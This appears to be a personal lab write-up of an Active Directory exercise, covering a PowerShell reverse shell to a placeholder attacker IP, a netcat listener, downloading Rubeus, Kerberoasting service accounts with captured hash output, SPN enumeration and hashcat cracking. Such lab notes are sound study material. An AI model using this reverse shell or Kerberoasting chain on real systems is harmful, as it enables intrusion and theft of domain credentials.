⛹️‍♂️Exercise

Reference:

https://theitbros.com/install-and-import-powershell-active-directory-module/

Web Shell

Reverse Shell (PS)

Netcat Listener

nc -lvnp <port>

Start a listener on the attacker machine

Reverse Shell Payload

$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I managed to gain a reverse shell after accessing the victim's web shell.

Spawning a TTY Shell (Python) - Exercise

python -c 'import pty; pty.spawn("/bin/sh")'

I realized it is not needed to spawn a TTY shell.

Example

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 5566
listening on [any] 5566 ...
connect to [10.10.16.4] from (UNKNOWN) [10.129.183.0] 49706
python -c 'import pty; pty.spawn("/bin/sh")'
PS C:\windows\system32\>

whoami

PS C:\windows\system32\> whoami
nt authority\system

Enumerating SPNs (Rubeus)

wget rubeus.exe (Kali)

┌──(kali㉿kali)-[~]
└─$ wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/bff8d467e73f88ab61e5db290805b9234e4bb360/dotnet%20v4.7.2%20compiled%20binaries/Rubeus.exe?raw=true

┌──(kali㉿kali)-[~/htb/AD]
└─$ mv 'Rubeus.exe?raw=true' Rubeus.exe

Download Rubeus to the attacker's machine
Upload Rubeus.exe using the victim's web shell upload function.

Using the /stats Flag

Gathering stats using Rubeus

PS C:\> .\Rubeus.exe kerberoast /stats

[*] Action: Kerberoasting

[*] Listing statistics about target users, no ticket requests being performed.
[*] Target Domain          : INLANEFREIGHT.LOCAL
[*] Searching path 'LDAP://DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 7


 ------------------------------------- 
 | Supported Encryption Type | Count |
 ------------------------------------- 
 | RC4_HMAC_DEFAULT          | 7     |
 ------------------------------------- 

 ---------------------------------- 
 | Password Last Set Year | Count |
 ---------------------------------- 
 | 2022                   | 7     |
 ----------------------------------

Using the /nowrap Flag

PS C:\> .\Rubeus.exe kerberoast /nowrap

[*] SamAccountName         : svc_sql
[*] DistinguishedName      : CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
[*] ServicePrincipalName   : MSSQLSvc/SQL01.inlanefreight.local:1433
[*] PwdLastSet             : 3/30/2022 2:14:52 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433@INLANEFREIGHT.LOCAL*$D305B2AEF2BBCA08F45B6620A1F31083$78542BBC7308AE64A871910517AE

Enumerating SPNs (Semi Manual Method)

🪟Windows - Kerberoasting

setspn.exe

setspn.exe -Q */*

Built-in setspn binary to enumerate SPNs in the domain.

Example

CN=krbtgt,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        kadmin/changepw
CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        MSSQLSvc/SQL01.inlanefreight.local:1433
CN=sqlprod,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        MSSQLSvc/SQL02.inlanefreight.local:1433
CN=sqldev,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        MSSQLSvc/SQL-DEV01.inlanefreight.local:1433
CN=sqltest,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        MSSQLSvc/DEVTEST.inlanefreight.local:1433
CN=sqlqa,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        MSSQLSvc/QA001.inlanefreight.local:1433
CN=azureconnect,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        adfsconnect/azure01.inlanefreight.local
CN=backupjob,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
        backupjob/veam001.inlanefreight.local

Target a Single User

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/SQL01.inlanefreight.local:1433"

Id                   : uuid-c043c692-759a-4f07-b6d3-642834677789-1
SecurityKeys         : {System.IdentityModel.Tokens.InMemorySymmetricSecurityKey}
ValidFrom            : 7/7/2022 7:35:05 AM
ValidTo              : 7/7/2022 4:31:54 PM
ServicePrincipalName : MSSQLSvc/SQL01.inlanefreight.local:1433
SecurityKey          : System.IdentityModel.Tokens.InMemorySymmetricSecurityKey

Hashcat

┌──(kali㉿kali)-[~]
└─$ hashcat -m 13100 hashfile /usr/share/wordlists/rockyou.txt

Reference:

https://owasp.org/www-pdf-archive/OWASP_Frankfurt_-44_Kerberoasting.pdf

PreviousWindows - Kerberoasting NextLinux

Last updated 2 years ago